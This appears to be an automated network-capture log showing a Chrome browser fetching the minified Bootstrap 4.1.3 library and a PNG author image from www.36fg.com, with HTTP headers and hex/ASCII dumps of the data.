                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKWe4UTSwPdpco1yK4JQC2x%2BUP9NhL%2FVIOzeyGc3Jc0yOILjF2u93UK%2BL5KZLrP5klPNjNpSb42DlVMDrGhidyQyDt%2FTwzCOkMDMH1xDNDuSVZsV2yKxMX3qgpCxbyg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a88d627cae-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1969&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1181&delivery_rate=1482986&cwnd=190&unsent_bytes=0&cid=66c74ce8c12b08b5&ts=156&x=0"
                                                        2025-03-15 00:17:56 UTC368INData Raw: 37 63 38 65 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                        Data Ascii: 7c8e/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75
                                                        Data Ascii: tion"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"valu
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 45 6e 2c 43 6e 2c 54 6e 2c 62 6e 2c 53 6e 2c 49 6e 2c 41 6e 2c 44 6e 2c 77 6e 2c 4e 6e 2c 4f 6e 2c 6b 6e 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e
                                                        Data Ascii: En,Cn,Tn,bn,Sn,In,An,Dn,wn,Nn,On,kn,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRAN
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73
                                                        Data Ascii: rget).is(this))return t.handleObj.handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 5f 44 41 54 41 5f 41 50 49 2c 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 2c 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c
                                                        Data Ascii: _DATA_API,'[data-dismiss="alert"]',_._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 6e 74 29 2e 6f 6e 28 4f 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f
                                                        Data Ascii: nt).on(O.CLICK_DATA_API,I,function(t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 3d 50 28 74 29 5b 30 5d 2c 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e
                                                        Data Ascii: t=P(t)[0],this._indicatorsElement=this._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 43 6f 6e 66 69 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65
                                                        Data Ascii: ndicatorsElement=null},t._getConfig=function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 69 67 67 65 72 28 72 29 2c 72 7d 2c 74 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c
                                                        Data Ascii: igger(r),r},t._setActiveIndicatorElement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._sl
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 68 69 73 29 2e 64 61 74 61 28 48 2c 74 29 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 69 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45
                                                        Data Ascii: his).data(H,t)),"number"==typeof i)t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromE


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.549761104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC452OUTGET /static/picture/blog-author.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC987INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 17542
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        etag: "60e7ae7a-4486"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 45077
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H87jz7qbBvipaeZko55IeE6zmH9W3B6oldnMiMJC4ENOQyNvuN%2Bnp0%2F3grVFAIK%2FSyj8aOHYUFvR4zSztU4%2BNc3qUe%2Ba72Hl8bUXriOiBpqa93wonzK9YCIF%2Bz%2F88B4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a87ed041c3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1667&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1024&delivery_rate=1740166&cwnd=74&unsent_bytes=0&cid=e52379298d982d1b&ts=132&x=0"
                                                        2025-03-15 00:17:56 UTC382INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 5a 08 06 00 00 00 38 a8 41 02 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRZZ8AtEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 61 61 63 62 34 37 33 2d 62 64 33 35 2d 32 33 34 61 2d 38 38 63 61 2d 31 38 30 34 62 66 33 33 32 31 64 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 33 41 43 30 45 32 41 46 46 42 45 31 31 31 45 39 41 38 35 42 41 34 36 45 37 39 39 37 41 45 43
                                                        Data Ascii: .adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:3AC0E2AFFBE111E9A85BA46E7997AEC
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 5a 0f 57 c9 16 5e f2 bc 4c 43 dc e3 13 2d 3c 53 22 b3 f4 77 ff c2 4c 72 d3 30 47 97 10 d1 24 36 7c 00 5f df 89 73 33 c1 b1 37 20 6e f8 bc e1 3e 63 84 98 e1 c9 e3 01 da b6 25 cb 5a 6d 27 11 53 fc 8c fe e7 bb df fc 1a 3d f6 a3 87 69 6e 6e 8e 8e 1c 3b 46 7f fb 89 4f d0 b7 1f fc 67 f2 06 3d 4a c6 62 f5 74 2c f2 d7 d1 54 fc 8f 56 57 b7 d6 d2 10 29 53 93 13 54 a9 37 28 9f cf d0 1b df f4 66 32 2c 9b 2a d5 3a bd e1 5f ff 02 1d 7f ce ad 10 31 51 10 b5 27 f7 61 a2 6e 6f 6e 52 69 7c 8c 0a 98 88 cd 8d 0d ad 93 bc d0 ca bc 01 a1 c3 8a 6f c8 c9 9a 78 be 72 d4 44 e6 25 e9 2f 8b 30 a1 78 bf a9 6e 90 c6 ef df c1 cf ff 80 4f 92 a9 60 ec 3e 36 44 d8 e1 c4 28 f1 a5 ee 85 ff b9 43 59 3d 22 c2 b4 bc 54 b2 3b ac 5c 5d 21 02 73 5f 3a 99 a4 8f fc de ef d2 7f fb dd df a3 03 53 63
                                                        Data Ascii: ZW^LC-<S"wLr0G$6|_s37 n>c%Zm'S=inn;FOg=Jbt,TVW)ST7(f2,*:_1Q'anonRi|oxrD%/0xnO`>6D(CY="T;\]!s_:Sc
                                                        2025-03-15 00:17:56 UTC1369INData Raw: fa dc df 7f 9a 9e 7a f2 09 3a 0a f1 b1 bd bd 45 db e5 06 b0 6e 81 1c 1c d7 6d 36 c5 8c de ae b7 04 ef da 20 2e 13 c2 36 cc c0 74 e6 6d 29 28 b5 6e df 51 e8 09 dc 99 88 46 69 ff dc 3e 85 9a 18 bd 30 6a c0 23 34 5a 5d 10 34 76 ed e8 dc dc eb 76 2a cd f3 eb 9b 5b b8 06 0c 18 4c 14 e3 ec c9 52 81 56 a1 13 8e ec 9f a6 3c 18 81 95 e8 e4 c4 04 7d f5 4b 5f a6 9b 6f bb 9d fe d3 87 7e 4f c1 3b 65 69 39 da 2e 53 5a 3d 3c 48 cf f7 73 f8 a2 c4 34 ee 80 80 ff 3a 8e 9b e0 63 6d 2b 32 e2 d7 08 73 be 9a 18 1f c2 90 70 99 85 c1 b3 65 c9 06 05 73 b1 6f b6 8f 88 2f 47 ec d3 40 0f f0 04 66 60 a1 7d 1f 08 e2 3d ef 7e 17 b8 b7 0d 94 61 d0 d6 d6 0e c5 13 49 8a 26 12 4a 99 e1 7e 83 6e 9f 5a 2c 16 d8 42 04 d7 f1 d8 22 a0 74 04 bf e3 50 6a e9 4c 1a dc 9b 00 27 db 14 8b 45 40 50 93
                                                        Data Ascii: z:Enm6 .6tm)(nQFi>0j#4Z]4vv*[LRV<}K_o~O;ei9.SZ=<Hs4:cm+2speso/G@f`}=~aI&J~nZ,B"tPjL'E@P
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 8b e7 e9 da b5 6b f2 7b 09 f2 f8 f4 63 0f d1 e2 02 96 3a 14 9a 05 f4 d9 03 b1 1a e0 64 76 5d 47 70 6d c6 b6 36 ae 59 07 81 78 12 92 30 2a 52 30 34 0e 4d 8f 51 b5 ba 43 3f 78 fc 1a 60 20 ef b3 45 41 66 21 42 d8 90 b1 21 d2 22 f8 3b 93 85 58 01 87 37 41 1d 17 cf 62 83 0e db 95 ba 60 6f 88 09 61 82 14 e8 30 c0 df ad 46 9b 0a 10 43 91 48 ec df 37 ba 9d 07 13 e4 7c c1 c4 f1 5d 58 98 09 76 56 61 a8 ac 81 6a 78 16 01 0b 3e ea f0 97 ad 2f 91 59 9e e2 cf 41 f0 d9 4f 20 7f 0b 61 e5 e7 89 f5 b6 8b 8b 3d 25 6a fd 60 8d f9 53 9c e0 be 98 62 c5 65 08 dc 13 a1 a1 27 46 ed 9b 00 06 fd da 97 bf 48 1f fd d3 3f a1 67 9f 7e 5a 9e a5 54 ca 09 01 d9 31 c4 83 e1 95 30 c0 b5 59 8e c6 a0 0c f3 e0 e2 01 8c 12 56 4a 69 28 be 0c 14 21 2f f1 e3 fb 67 71 4c 8f 1e 79 f6 12 88 d3 02 57
                                                        Data Ascii: k{c:dv]Gpm6Yx0*R04MQC?x` EAf!B!";X7Ab`oa0FCH7|]XvVajx>/YAO a=%j`Sbe'FH?g~ZT10YVJi(!/gqLyW
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 50 21 11 25 63 90 a4 36 ce 65 7f f1 b1 7c 82 6e 9a 9b 00 e7 c2 0c cf e7 24 8e 98 48 a5 c5 73 97 cc 2a e2 31 4a 10 db d4 86 f8 80 18 60 dc 13 2d 25 71 ff a8 0a 43 61 4c 2c 2a 38 4c e6 02 a5 38 30 ef f7 15 c6 28 07 d3 ba d7 eb 4b f0 96 1d 56 fc 9c 56 34 4e 9b 4b 0b 49 3c db 07 f7 1f 3c f0 1f 99 1e 0d ac 8e 28 56 9d ed a7 0b 68 87 4f 1e e2 e1 9d 41 fe 86 a1 64 a8 a7 97 aa e2 5c a5 18 5d c7 0d 50 84 9f ff e1 1b 1a 2a df c1 11 42 f9 f2 d8 cf fa 19 95 d9 4e 90 18 c3 d7 b6 f0 b7 56 af d1 e5 cb 97 e9 da d5 79 41 23 31 10 83 1d 46 5d 60 66 9b 51 81 a9 ac 51 16 35 fc 61 4e 64 ae 11 e8 88 bf f1 44 9c aa 38 73 16 ca ee e4 81 69 9a 86 35 98 49 a4 29 05 c3 27 55 c8 53 3c 95 14 f9 ce 37 e4 bf 92 fb c1 04 85 18 30 23 98 5c 76 ab c6 f8 7b 44 7d b0 aa 48 90 98 23 7e 6c 62
                                                        Data Ascii: P!%c6e|n$Hs*1J`-%qCaL,*8L80(KVV4NKI<<(VhOAd\]P*BNVyA#1F]`fQQ5aNdD8si5I)'US<70#\v{D}H#~lb
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 9c 1a 10 85 bc 3d 39 53 a4 7b 0e 4e d3 a9 a3 73 74 7c 9f ca af 98 2c e6 89 6d 00 4e 2a 77 75 d4 dd d0 99 b1 22 ee 5c df 16 30 54 a2 8e ad 23 19 92 cf 6d 29 a2 4a 7a 99 ad 22 4c bc 9d 03 bd 01 0e 53 a2 54 8c 3b d6 43 cc fd 8e 0a 32 8b be e3 0c 28 4f 05 38 18 a5 60 12 ef 67 2b c9 d6 52 f4 a5 7e ec 2f 08 98 0e a3 52 34 62 0c 7a 6e 90 fc 6d 90 19 c8 5e 53 27 65 fb 8e 27 7e 30 f6 c4 29 af 1c dd 20 e5 76 98 cf 2c 99 a1 90 6d 71 70 e2 cc be 19 5a 5d 59 11 57 e8 38 e0 18 a3 0d 21 08 4e 6f 41 19 c6 58 91 e1 c7 7e 10 f4 e4 be 31 ca 43 c4 8c e5 52 d4 81 5c 3d 30 0d 2b 70 2c 2f 44 8c 46 31 48 5e e2 2e 70 b2 19 53 04 63 f8 66 2a a8 2a fe 77 c3 0a 08 c4 84 25 df 71 26 49 f5 3e 47 2b 88 2b 42 53 07 8e f5 b2 f7 43 d1 c3 a4 35 5e 09 03 e5 09 04 fb 68 78 6b de 67 62 5c 7c
                                                        Data Ascii: =9S{Nst|,mN*wu"\0T#m)Jz"LST;C2(O8`g+R~/R4bznm^S'e'~0) v,mqpZ]YW8!NoAX~1CR\=0+p,/DF1H^.pScf**w%q&I>G++BSC5^hxkgb\|
